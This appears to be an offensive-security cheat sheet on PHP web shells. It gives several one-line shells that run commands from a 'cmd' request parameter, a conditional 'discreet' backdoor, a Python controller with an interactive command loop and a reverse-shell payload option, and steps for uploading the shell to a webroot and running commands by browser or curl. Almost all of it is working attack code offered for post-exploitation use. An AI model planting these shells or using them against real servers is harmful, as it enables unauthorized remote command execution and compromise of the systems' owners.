PHP
FORMAT
DIRECT
root@oco:~$ nano phpWebShell.php
...
<?php system($_REQUEST["cmd"]); ?>
...
#access
root@oco:~$ curl http://{targetSite:port}?cmd=idroot@oco:~$ echo '<?php echo system($_REQUEST['cmd']);?>' > shell.phpGET REQUEST
root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
* the system() function which takes the URL parameter
cmd as an input and executes it as a system command.
* this is a non-interactive shell as it runs a single command per request
and returns the result. there's no back-and-forth, ongoing interaction
like in a terminal or shell.CONDITIONAL
acts as a standalone backdoor. It listens for a specific cmd parameter in HTTP requests and executes system-level commands only if that condition is met—making it simple, discreet, and effective on its own.
root@oco:~$ nano backdoor.php
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>OPTIONAL CONTROLLER
this optional piece isn't required for the PHP shell to function. Instead, it serves as a convenience tool—designed to automate interaction with the PHP shell. It offers optional features like sending a one-time payload or launching an interactive loop, simplifying command execution and improving operator efficiency during post-exploitation.
In essence, the PHP shell is the implant, and the Python script is an optional controller that streamlines engagement.
root@oco:~$ nano webShell.py
import argparse, time, requests, os # imports four modules argparse (used for system arguments), time (used for time), requests (used for HTTP/HTTPs Requests), os (used for operating system commands)
parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs") # generates a variable called parser and uses argparse to create a description
parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True) # specifies flags such as -t for a target with a help and required option being true
parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload") # similar to above
parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes") # similar to above
args = parser.parse_args() # defines args as a variable holding the values of the above arguments so we can do args.option for example.
if args.target == None and args.payload == None: # checks if args.target (the url of the target) and the payload is blank if so it'll show the help menu
parser.print_help() # shows help menu
elif args.target and args.payload: # elif (if they both have values do some action)
print(requests.get(args.target+"/?cmd="+args.payload).text) ## sends the request with a GET method with the targets URL appends the /?cmd= param and the payload and then prints out the value using .text because we're already sending it within the print() function
if args.target and args.option == "yes": # if the target option is set and args.option is set to yes (for a full interactive shell)
os.system("clear") # clear the screen (linux)
while True: # starts a while loop (never ending loop)
try: # try statement
cmd = input("$ ") # defines a cmd variable for an input() function which our user will enter
print(requests.get(args.target+"/?cmd="+cmd).text) # same as above except with our input() function value
time.sleep(0.3) # waits 0.3 seconds during each request
except requests.exceptions.InvalidSchema:
print("Invalid URL Schema: http:// or https://")
except requests.exceptions.ConnectionError:
print("URL is invalid")UPLOAD METHODS
SITE UPLOAD METHOD
once the shell script has been tailored with specific IPs and Port, etc it must be uploaded to the target's web directory (webroot) to execute the script through the web browser
root@oco:~$ BROWSER > {targetSite:port} > File Upload
...RCE METHOD
root@target:~$ echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
...ACCESS
BROWSER METHOD
root@oco:~$ BROWSER > http://SERVER_IP:PORT/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)CLI METHOD
root@oco:~$ curl {targetSite:port}/phpWebShell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Last updated